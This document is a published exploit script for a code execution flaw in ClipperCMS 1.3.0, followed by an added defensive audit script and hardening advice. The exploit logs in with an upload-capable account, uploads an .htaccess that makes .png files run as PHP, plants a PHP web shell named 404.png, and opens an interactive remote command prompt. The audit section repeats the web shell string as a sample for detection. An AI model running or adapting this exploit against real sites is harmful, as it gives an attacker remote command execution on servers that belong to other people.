ClipperCMS 1.3.0 - Code Execution Vulnerability
Source: crt@curesec.com  Author: curesec  Published: 2015-11-17
#!/usr/local/bin/python
# Exploit for ClipperCMS 1.3.0 Code Execution vulnerability
# An account is required with rights to file upload (eg a user in the Admin, Publisher, or Editor role)
# The server must parse htaccess files for this exploit to work.
# Curesec GmbH crt@curesec.com
 
import sys
import re
import requests # requires requests lib
 
if len(sys.argv) != 4:
    exit("usage: python " + sys.argv[0] + " http://example.com/ClipperCMS/ admin admin")
 
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
 
loginPath = "/manager/processors/login.processor.php"
fileManagerPath = "/manager/index.php?a=31"
 
def login(requestSession, url, username, password):
    postData = {"ajax": "1", "username": username, "password": password}
    return requestSession.post(url, data = postData, headers = {"referer": url})
 
def getFullPath(requestSession, url):
    request = requestSession.get(url, headers = {"referer": url})
    if "You don't have enough privileges" in request.text:
        return "cant upload"
    fullPath = re.search("var current_path = '(.*)';", request.text)
    return fullPath.group(1)
 
def upload(requestSession, url, fileName, fileContent, postData):
    filesData = {"userfile[0]": (fileName, fileContent)}
    return requestSession.post(url, files = filesData, data = postData, headers = {"referer": url})
 
def workingShell(url, fullPath):
    return fullPath.strip("/") in requests.get(url + "pwd", headers = {"referer": url}).text.strip("/")
 
def runShell(url):
    print("enter command, or enter exit to quit.")
    command = raw_input("$ ")
    while "exit" not in command:
        print(requests.get(url + command).text)
        command = raw_input("$ ")
 
requestSession = requests.session()
 
loginResult = login(requestSession, url + loginPath, username, password)
if "Incorrect username" in loginResult.text:
    exit("ERROR: Incorrect username or password")
else:
    print("successful: login as " + username)
 
fullPath = getFullPath(requestSession, url + fileManagerPath)
if fullPath == "cant upload":
    exit("ERROR: user does not have required privileges")
else:
    print("successful: user is allowed to use file manager. Full path: " + fullPath)
 
uploadResult = upload(requestSession, url + fileManagerPath, ".htaccess", "AddType application/x-httpd-php .png", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
    exit("ERROR: could not upload .htaccess file")
else:
    print("successful: .htaccess upload")
 
uploadResult = upload(requestSession, url + fileManagerPath, "404.png", "<?php passthru($_GET['x']) ?>", {"path": fullPath})
if "File uploaded successfully" not in uploadResult.text:
    exit("ERROR: could not upload shell")
else:
    print("successful: shell upload. Execute commands via " + url + "404.png?x=<COMMAND>")
 
if workingShell(url + "404.png?x=", fullPath):
    print("successful: shell seems to be working")
else:
    exit("ERROR: shell does not seem to be working correctly")
 
runShell(url + "404.png?x=")
 
 
#Blog Reference:
#http://blog.curesec.com/article/blog/ClipperCMS-130-Code-Execution-Exploit-96.html
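
A defender-side audit for the two artifacts the script above writes into the file manager path: an .htaccess that maps an image extension to the PHP handler, and an image file whose content is PHP. This is an added example, not part of the Curesec code; the function names, the extension list and the sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Apache directives that can remap a file extension to the PHP handler.
HANDLER_RE = re.compile(
    r"^\s*(AddType|AddHandler|SetHandler)\b.*(php|x-httpd)", re.I | re.M)
# Extensions that should only ever hold static content (assumed list).
STATIC_EXT = {".png", ".jpg", ".jpeg", ".gif", ".ico", ".svg", ".txt"}
PHP_TAG_RE = re.compile(rb"<\?php", re.I)

def audit_tree(root):
    """Return a sorted list of (finding, relative_path) for files under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(1 << 20)  # inspect at most the first 1 MiB
            except OSError:
                continue  # unreadable file: skip it, keep scanning
            ext = os.path.splitext(name)[1].lower()
            if name == ".htaccess":
                if HANDLER_RE.search(data.decode("latin-1")):
                    findings.append(("htaccess-handler-override", rel))
            elif ext in STATIC_EXT and PHP_TAG_RE.search(data):
                findings.append(("php-in-static-file", rel))
    return sorted(findings)

def build_sample_tree():
    """Constructed sample: one clean image plus the two files described above."""
    root = tempfile.mkdtemp(prefix="webroot-")
    samples = {
        "assets/logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
        ".htaccess": b"AddType application/x-httpd-php .png\n",
        "404.png": b"<?php passthru($_GET['x']) ?>",
    }
    for rel, content in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return root

if __name__ == "__main__":
    for finding, rel in audit_tree(build_sample_tree()):
        print(finding, rel)
```

The header comment notes that the server must parse htaccess files; setting AllowOverride None in the Apache configuration for upload-writable directories removes that precondition, so a dropped .htaccess has no effect there.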
 